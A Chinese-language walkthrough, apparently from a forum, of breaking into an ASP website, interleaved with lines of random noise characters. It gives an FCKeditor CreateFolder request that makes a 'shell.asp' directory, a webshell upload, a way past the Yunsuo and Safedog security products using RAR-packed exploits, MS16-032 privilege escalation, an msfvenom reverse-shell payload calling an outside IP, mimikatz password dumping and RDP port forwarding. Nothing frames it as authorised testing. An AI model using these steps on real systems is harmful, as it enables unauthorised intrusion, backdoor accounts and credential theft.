|
$ n- p) N3 f0 r$ X( W
# i+ e( U. v& ]/ @* z: c
' j9 h6 [5 r6 @: |5 ^% r
6 n1 G' C! K0 O$ m
|
2 b& ]' \. K' O6 U
+ l9 K9 z3 m" J
* n- {3 a+ C' \* ?& J3 X一、 利用getwebshell篇
1 T; R2 f9 z: v ; B3 n0 F$ Q8 q7 A8 @
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
# v! p. \; A- [) h3 Y8 d1 f) U. a * k* i: ~& i% F) Q8 c

% U7 l) `4 H3 n4 V& ?2 Y下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到) 1 ]+ d) x6 M6 O: h" B& T1 x* ^

# s- g. _$ M5 u/ X; s& a8 o) X# m3 l下面我们构造一个asp目录,如:
6 c, A+ G+ t3 Q2 Y. v
+ O+ `2 A1 K* l1 ^7 d ' ^* _) ?: \, ~* r
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
$ a2 F& n& U, W7 L5 P # S3 E$ K3 s" b, H; R* a
0 t2 W( u7 J/ \: T" }/ E7 ]; v5 D
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
0 t; B; _" L2 }- c. j7 ]- F; u - Q6 j* n7 f: U& ^7 W0 J3 E
一、 绕过安全狗云锁提权并且加账号 3 ~ s8 X! f. G+ Z7 A0 U3 t

3 g, G. [' a* H2 J2 j$ X4 d8 t没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
" ~4 h8 U( L, }( e; h
7 X; `3 g+ I5 l, B: _4 g3 }如图:
% H: Z1 V `9 |5 ?0 `% K2 s5 a3 { / L$ S8 y1 T3 b* j: ^" B# N5 k8 ]
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit 7 A0 V0 J6 l/ ~/ `6 W0 T
! k, ]2 |, T b
一、 利用metasploit : I4 S5 r% |/ G) X7 V
# E$ B. N `1 F0 E; N; Z首先用pentestbox生成一个64位的payload如下命令 * p* V# O) G7 R$ L
7 [4 J8 Z7 g2 r& m& E) Q5 B/ {
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe " }3 z7 [5 i& m, \* E3 h. M. N8 A
; Z5 c- @+ {' }6 L% q9 ?为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图: & d/ i3 u0 r% i" Q' d* s& U

# O; e: s+ h/ S o# ?/ S下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: # d( A/ A5 C) w; M- P* O
 0 b; K5 \' e5 {' V' ?
下面我们来做一个监听如下命令:
3 q! P2 D8 G. |! A3 e: f ~: n5 d4 E: C& H( u9 `3 x' P: ?. S& O
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图: $ ~: e2 B2 R3 Q9 q# q
; U4 }. T% A8 R2 y $ M. ]- Y# d4 Z9 S' ]/ c0 X3 h
|
. F4 Z3 m: \5 k7 E
~4 g: d2 ^1 F! A : Y" A# m! m2 a5 \7 L
# x) I' O" Z5 Z8 T
! j$ ]3 H% P" B2 Z* W8 i! P: `3 z4 L' B4 y# g/ Q. H
" I( j9 [3 g$ o
$ h! d; E9 s2 I$ V
4 L/ F" t+ D0 R; {& o# [& \1 e. F 6 d% [' d2 K. s3 f# \% ]" O
- z9 m! d1 B5 I1 O
) W5 D2 n: o9 }2 U7 U. @8 ^2 k; j: z% e
Y8 Y; O! g' A
|